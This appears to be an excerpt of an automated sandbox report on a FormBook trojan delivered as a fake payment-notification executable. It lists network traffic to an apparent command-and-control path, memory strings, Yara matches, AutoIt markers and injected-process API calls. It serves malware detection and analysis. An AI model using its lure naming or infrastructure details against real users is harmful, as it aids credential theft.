Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:29:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:29:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:29:24 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3761974191.0000000003006000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3761974191.0000000003006000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000005.00000002.3763664515.0000000004EF2000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.0000000004452000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000005.00000002.3763664515.0000000004EF2000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.0000000004452000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000005.00000002.3760623624.0000000003478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000005.00000002.3760623624.0000000003478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000005.00000002.3760623624.0000000003478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000005.00000002.3760623624.0000000003478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033K
Source: netbtugc.exe, 00000005.00000002.3760623624.0000000003478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000005.00000002.3760623624.0000000003478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000005.00000003.1639704772.000000000849E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000005.00000002.3763664515.000000000553A000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.0000000004A9A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?6d6p=mxnR
Source: netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000005.00000002.3765040017.0000000006A70000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3763664515.0000000004BCE000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.000000000412E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.000000000412E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_009AEAFF

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_009AED6A

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

0_2_009AEAFF

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_0099AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0099AA57

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_009C9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: Payment Notification Confirmation 010_01_2025.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000000.1293412015.00000000009F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_27d2a6a8-b
Source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000000.1293412015.00000000009F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2e4dd1cf-7
Source: Payment Notification Confirmation 010_01_2025.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_365de5ec-b
Source: Payment Notification Confirmation 010_01_2025.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_16d761a3-a

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment Notification Confirmation 010_01_2025.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003DB363 NtClose,	2_2_003DB363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B1D09 NtProtectVirtualMemory,	2_2_003B1D09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B60 NtClose,LdrInitializeThunk,	2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,	2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074340 NtSetContextThread,	2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074650 NtSuspendThread,	2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B80 NtQueryInformationFile,	2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BA0 NtEnumerateValueKey,	2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BE0 NtQueryValueKey,	2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BF0 NtAllocateVirtualMemory,	2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AB0 NtWaitForSingleObject,	2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AD0 NtReadFile,	2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AF0 NtWriteFile,	2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F30 NtCreateSection,	2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F60 NtCreateProcessEx,	2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F90 NtProtectVirtualMemory,	2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FA0 NtQuerySection,	2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FB0 NtResumeThread,	2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FE0 NtCreateFile,	2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E30 NtWriteVirtualMemory,	2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E80 NtReadVirtualMemory,	2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EA0 NtAdjustPrivilegesToken,	2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EE0 NtQueueApcThread,	2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D00 NtSetInformationFile,	2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D10 NtMapViewOfSection,	2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D30 NtUnmapViewOfSection,	2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DB0 NtEnumerateKey,	2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DD0 NtDelayExecution,	2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C00 NtQueryInformationProcess,	2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C60 NtCreateKey,	2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CA0 NtQueryInformationToken,	2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CC0 NtQueryVirtualMemory,	2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CF0 NtOpenProcess,	2_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073010 NtOpenDirectoryObject,	2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073090 NtSetValueKey,	2_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030739B0 NtGetContextThread,	2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D10 NtOpenProcessToken,	2_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D70 NtOpenThread,	2_2_03073D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A54340 NtSetContextThread,LdrInitializeThunk,	5_2_03A54340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A54650 NtSuspendThread,LdrInitializeThunk,	5_2_03A54650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_03A52BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_03A52BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_03A52BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52B60 NtClose,LdrInitializeThunk,	5_2_03A52B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52AF0 NtWriteFile,LdrInitializeThunk,	5_2_03A52AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52AD0 NtReadFile,LdrInitializeThunk,	5_2_03A52AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52FB0 NtResumeThread,LdrInitializeThunk,	5_2_03A52FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52FE0 NtCreateFile,LdrInitializeThunk,	5_2_03A52FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52F30 NtCreateSection,LdrInitializeThunk,	5_2_03A52F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_03A52E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_03A52EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03A52DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52DD0 NtDelayExecution,LdrInitializeThunk,	5_2_03A52DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_03A52D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_03A52D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_03A52CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52C60 NtCreateKey,LdrInitializeThunk,	5_2_03A52C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_03A52C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A535C0 NtCreateMutant,LdrInitializeThunk,	5_2_03A535C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A539B0 NtGetContextThread,LdrInitializeThunk,	5_2_03A539B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52B80 NtQueryInformationFile,	5_2_03A52B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52AB0 NtWaitForSingleObject,	5_2_03A52AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52FA0 NtQuerySection,	5_2_03A52FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52F90 NtProtectVirtualMemory,	5_2_03A52F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52F60 NtCreateProcessEx,	5_2_03A52F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52EA0 NtAdjustPrivilegesToken,	5_2_03A52EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52E30 NtWriteVirtualMemory,	5_2_03A52E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52DB0 NtEnumerateKey,	5_2_03A52DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52D00 NtSetInformationFile,	5_2_03A52D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52CF0 NtOpenProcess,	5_2_03A52CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52CC0 NtQueryVirtualMemory,	5_2_03A52CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A52C00 NtQueryInformationProcess,	5_2_03A52C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A53090 NtSetValueKey,	5_2_03A53090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A53010 NtOpenDirectoryObject,	5_2_03A53010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A53D10 NtOpenProcessToken,	5_2_03A53D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A53D70 NtOpenThread,	5_2_03A53D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03267B50 NtDeleteFile,	5_2_03267B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03267BE0 NtClose,	5_2_03267BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03267A70 NtReadFile,	5_2_03267A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03267920 NtCreateFile,	5_2_03267920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03267D30 NtAllocateVirtualMemory,	5_2_03267D30

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_0099D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0099D5EB

